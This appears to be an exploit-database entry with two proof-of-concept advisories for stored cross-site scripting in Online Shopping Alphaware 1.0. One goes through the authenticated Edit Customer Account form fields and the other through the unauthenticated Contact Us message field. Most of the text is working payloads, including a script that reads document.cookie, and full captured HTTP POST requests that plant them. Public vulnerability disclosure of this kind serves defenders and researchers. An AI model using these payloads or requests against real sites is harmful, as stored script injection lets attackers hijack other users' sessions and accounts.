Share
## https://sploitus.com/exploit?id=PACKETSTORM:158778
# Exploit Title: Online Shopping Alphaware 1.0 - 'Edit Customer Account' Persistent Cross-Site Scripting (Authenticated)  
# Date: 2020-8-4  
# Exploit Author: Edo Maland  
# Vendor Homepage: https://www.sourcecodester.com/php/14368/online-shopping-alphaware-phpmysql.html  
# Software Link: https://www.sourcecodester.com/download-code?nid=14368&title=Online+Shopping+Alphaware+in+PHP%2FMysql  
# Version: 1.0  
# Tested On Windows & Linux Server  
  
# Vulnerability Details  
# Description : A persistent cross-site scripting vulnerability exists within the 'Edit Customer Account' functionality of application.   
# Vulnerable Parameter :   
- firstname  
- lastname  
- address  
- Country  
- Mobile  
  
  
# POC  
  
Login to your Account  
Go to url : http://example.com/alphaware/account.php  
Payload :   
- <img src=xss onerror=alert(1)>  
  
# Burp Requests  
  
POST /alphaware/function/edit_customer.php HTTP/1.1  
Host: example.com  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8  
Accept-Language: id,en-US;q=0.7,en;q=0.3  
Accept-Encoding: gzip, deflate  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 266  
Origin: http://example.com  
Connection: close  
Referer: http://example.com/alphaware/account.php?id=2  
Cookie: PHPSESSID=tokl2nlnjtjud32laqupj07sss  
Upgrade-Insecure-Requests: 1  
  
firstname=<img src=xss onerror=alert(1)>&mi=2&lastname=Evil&address=Yogyakarta&country=Indonesia&zipcode=1337&mobile=1337&telephone=1337&email=info@xss.id&password=xss&edit=Save Changes  
  
  
  
  
  
  
# Exploit Title: Online Shopping Alphaware 1.0 - 'Contact Us' Persistent Cross-Site Scripting (Unauthenticated)  
# Date: 2020-8-4  
# Exploit Author: Edo Maland  
# Vendor Homepage: https://www.sourcecodester.com/php/14368/online-shopping-alphaware-phpmysql.html  
# Software Link: https://www.sourcecodester.com/download-code?nid=14368&title=Online+Shopping+Alphaware+in+PHP%2FMysql  
# Version: 1.0  
# Tested On Windows & Linux Server  
  
# Vulnerability Details  
# Description : A persistent cross-site scripting vulnerability exists within the 'Contact Us' functionality of application.   
# Vulnerable Parameter : message  
  
  
# POC  
  
Go to url : http://example.com/alphaware/contactus.php  
Write a message with this payload (%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E)  
  
  
# Burp Requests  
  
POST /alphaware/contactus.php HTTP/1.1  
Host: example.com  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8  
Accept-Language: id,en-US;q=0.7,en;q=0.3  
Accept-Encoding: gzip, deflate  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 87  
Origin: http://example.com  
Connection: close  
Referer: http://example.com/alphaware/contactus.php  
Cookie: PHPSESSID=tokl2nlnjtjud32laqupj07sss  
Upgrade-Insecure-Requests: 1  
  
email=info%40xss.id&message=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&send=